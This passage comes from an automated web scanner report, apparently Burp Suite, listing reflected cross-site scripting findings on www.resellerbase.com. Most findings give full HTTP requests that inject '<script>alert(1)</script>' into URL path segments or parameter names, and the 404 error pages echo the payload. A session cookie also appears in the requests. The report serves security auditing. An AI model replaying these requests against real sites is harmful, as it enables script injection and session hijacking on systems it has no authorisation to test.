GET /web-service/other/themes/kosmos/images/ratingb22c8<script>alert(1)</script>aaf115546fc/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/ratingb22c8<script>alert(1)</script>aaf115546fc/4.gif was not found on this server.</p>
...[SNIP]...

2.5171. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/4.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload fcffc<script>alert(1)</script>91af09581d2 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/images/rating/4.giffcffc<script>alert(1)</script>91af09581d2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/rating/4.giffcffc<script>alert(1)</script>91af09581d2 was not found on this server.</p>
...[SNIP]...

2.5172. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/4.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/rating/4.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 95aaa<script>alert(1)</script>d758f6624fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/images/rating/4.gif?95aaa<script>alert(1)</script>d758f6624fc=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:47:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/rating/4.gif?95aaa<script>alert(1)</script>d758f6624fc=1 was not found on this server.</p>
...[SNIP]...

2.5173. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5f249<script>alert(1)</script>4661878c4ea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service5f249<script>alert(1)</script>4661878c4ea/other/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service5f249<script>alert(1)</script>4661878c4ea/other/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5174. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6cb92<script>alert(1)</script>ce0e574b5f8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other6cb92<script>alert(1)</script>ce0e574b5f8/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other6cb92<script>alert(1)</script>ce0e574b5f8/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5175. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f0aa2<script>alert(1)</script>5224f55066f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themesf0aa2<script>alert(1)</script>5224f55066f/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themesf0aa2<script>alert(1)</script>5224f55066f/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5176. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 72522<script>alert(1)</script>4cf17b421d5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos72522<script>alert(1)</script>4cf17b421d5/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos72522<script>alert(1)</script>4cf17b421d5/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5177. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c7265<script>alert(1)</script>b6485fbf4ab was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/imagesc7265<script>alert(1)</script>b6485fbf4ab/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/imagesc7265<script>alert(1)</script>b6485fbf4ab/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5178. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload a0aa2<script>alert(1)</script>50b1adb4256 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/images/ratinga0aa2<script>alert(1)</script>50b1adb4256/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/ratinga0aa2<script>alert(1)</script>50b1adb4256/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5179. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/search.php [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 4abc6<script>alert(1)</script>d1d506d6aec was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/images/rating/search.php4abc6<script>alert(1)</script>d1d506d6aec?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/rating/search.php4abc6<script>alert(1)</script>d1d506d6aec?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5180. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload c0c4b<a>2e3738c6da0 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/other/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchc0c4b<a>2e3738c6da0&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchc0c4b<a>2e3738c6da0&opt=2 was not found on this server.</p>
...[SNIP]...

2.5181. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload afe69<a>6dd4b09ad2f was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/other/themes/kosmos/images/rating/search.php?keyword=search...afe69<a>6dd4b09ad2f&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/rating/search.php?keyword=search...afe69<a>6dd4b09ad2f&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5182. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 62513<script>alert(1)</script>31d33e36103 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&62513<script>alert(1)</script>31d33e36103=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&62513<script>alert(1)</script>31d33e36103=1 was not found on this server.</p>
...[SNIP]...

2.5183. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 8b8b3<a>a2d667fcc34 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/other/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=28b8b3<a>a2d667fcc34 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=28b8b3<a>a2d667fcc34 was not found on this server.</p>
...[SNIP]...

2.5184. http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5daca<script>alert(1)</script>6e22ae67f59 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service5daca<script>alert(1)</script>6e22ae67f59/other/themes/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service5daca<script>alert(1)</script>6e22ae67f59/other/themes/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.5185. http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9503a<script>alert(1)</script>3df546728d1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other9503a<script>alert(1)</script>3df546728d1/themes/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other9503a<script>alert(1)</script>3df546728d1/themes/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.5186. http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2433d<script>alert(1)</script>f20ec48bd0f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes2433d<script>alert(1)</script>f20ec48bd0f/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes2433d<script>alert(1)</script>f20ec48bd0f/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.5187. http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f34dd<script>alert(1)</script>bb008c87cde was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmosf34dd<script>alert(1)</script>bb008c87cde/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmosf34dd<script>alert(1)</script>bb008c87cde/images/review/ was not found on this server.</p>
...[SNIP]...

2.5188. http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload df5a7<script>alert(1)</script>5fe15bed67f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/imagesdf5a7<script>alert(1)</script>5fe15bed67f/review/ HTTP/1.1
